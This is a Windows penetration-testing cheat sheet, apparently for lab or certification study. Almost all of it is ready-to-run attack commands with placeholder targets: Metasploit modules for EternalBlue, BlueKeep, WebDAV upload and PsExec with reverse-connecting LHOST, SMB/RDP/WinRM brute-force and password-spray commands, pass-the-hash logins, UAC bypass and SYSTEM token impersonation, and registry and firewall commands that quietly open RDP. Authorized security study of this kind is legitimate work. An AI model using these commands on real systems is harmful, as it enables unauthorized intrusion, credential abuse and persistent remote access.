Windows Exploitation
80 - WebDAV (IIS)
| Command | Description |
|---|---|
| nmap --script http-webdav-scan,http-methods -p 80 <IP> | Check if WebDAV is enabled and what methods are allowed. |
| davtest -url http://<IP>/webdav/ | Test which file types can be uploaded via WebDAV. |
| cadaver http://<IP>/webdav/ | Interactive WebDAV client. |
# MSF - WebDAV file upload exploit
use exploit/windows/iis/iis_webdav_upload_asp
set RHOSTS <IP>
set PATH /webdav/shell.asp
run
HFS (Rejetto)
use exploit/windows/http/rejetto_hfs_exec
set RHOSTS <IP>
set LHOST <kali_IP>
run
445 - SMB
EternalBlue (MS17-010)
# Check vulnerability
nmap -p 445 --script smb-vuln-ms17-010 <IP>
# MSF - exploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <IP>
set LHOST <kali_IP>
run
PsExec
# MSF - PsExec with credentials
use exploit/windows/smb/psexec
set RHOSTS <IP>
set SMBUser administrator
set SMBPass <password>
set LHOST <kali_IP>
run
# Using impacket
impacket-psexec administrator:<password>@<IP>
# Pass-the-hash with PsExec
impacket-psexec administrator@<IP> -hashes :<NTLM_hash>
crackmapexec smb <IP> -u administrator -H <NTLM_hash> -x "whoami"
Brute Force
| Command | Description |
|---|---|
| crackmapexec smb <IP> -u administrator -p /usr/share/wordlists/rockyou.txt | Dictionary attack against a single user (many passwords, one account). |
| crackmapexec smb <IP> -u users.txt -p passwords.txt --no-bruteforce | Test credential pairs one-to-one (line N of users.txt with line N of passwords.txt). |
| hydra -l administrator -P /usr/share/wordlists/rockyou.txt smb://<IP> | Hydra SMB brute force. |
use auxiliary/scanner/smb/smb_login
set RHOSTS <IP>
set SMBUser administrator
set PASS_FILE /usr/share/wordlists/rockyou.txt
run
Pass-the-Hash
| Command | Description |
|---|---|
| crackmapexec smb <IP> -u administrator -H <NTLM_hash> | SMB authentication with NTLM hash. |
| crackmapexec smb <IP> -u administrator -H <NTLM_hash> --shares | List shares via PTH. |
| smbclient //<IP>/<share> -U administrator%<NTLM_hash> --pw-nt-hash | Connect to share with NTLM hash. |
3389 - RDP
| Command | Description |
|---|---|
| nmap -p 3389 --script rdp-enum-encryption <IP> | Check RDP encryption level. |
| hydra -l administrator -P /usr/share/wordlists/rockyou.txt rdp://<IP> | Hydra RDP brute force. |
| crowbar -b rdp -s <IP>/32 -U users.txt -c password123 | Password spray against RDP (one password, many users). |
| xfreerdp /v:<IP> /u:<user> /p:<pass> | Connect to RDP from Linux. |
| xfreerdp /v:<IP> /u:administrator /pth:<NTLM_hash> | RDP pass-the-hash (requires Restricted Admin mode). |
| rdesktop -u <user> -p <pass> <IP> | Alternative RDP client. |
# MSF - BlueKeep (CVE-2019-0708) - RDP pre-auth RCE
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS <IP>
set LHOST <kali_IP>
run
5985 - WinRM
| Command | Description |
|---|---|
| nmap -p 5985,5986 <IP> | Check WinRM ports (HTTP=5985, HTTPS=5986). |
| crackmapexec winrm <IP> -u administrator -p <pass> | Test credentials via WinRM. |
| crackmapexec winrm <IP> -u administrator -H <NTLM_hash> | Pass-the-hash via WinRM. |
| crackmapexec winrm <IP> -u administrator -p /usr/share/wordlists/rockyou.txt | WinRM password brute force. |
| evil-winrm -i <IP> -u administrator -p <pass> | Interactive WinRM shell. |
| evil-winrm -i <IP> -u administrator -H <NTLM_hash> | WinRM shell via PTH. |
# MSF - WinRM brute force, opens a session directly on success
use auxiliary/scanner/winrm/winrm_login
set RHOSTS <IP>
set USERNAME administrator
set PASS_FILE /usr/share/wordlists/rockyou.txt
run
# Note: may produce false positives through SOCKS proxy - verify with crackmapexec
# On success: sessions -i <id>
use exploit/windows/winrm/winrm_script_exec
set RHOSTS <IP>
set USERNAME administrator
set PASSWORD <pass>
run
Windows Privilege Escalation
getsystem (Meterpreter)
meterpreter > getsystem
# Attempts multiple techniques: named pipe impersonation, token duplication
UAC Bypass
# MSF - UAC bypass via memory injection
use exploit/windows/local/bypassuac_injection
set SESSION <id>
set TARGET Windows\ x64
run
# MSF - UACMe
use exploit/windows/local/bypassuac
set SESSION <id>
run
Token Impersonation (Incognito)
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
Post-Exploitation Quick Reference
# Basic recon from shell
whoami
whoami /priv
net user
net localgroup administrators
systeminfo
ipconfig /all
arp -a
netstat -ano
# Enable RDP if disabled
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=in localport=3389 action=allow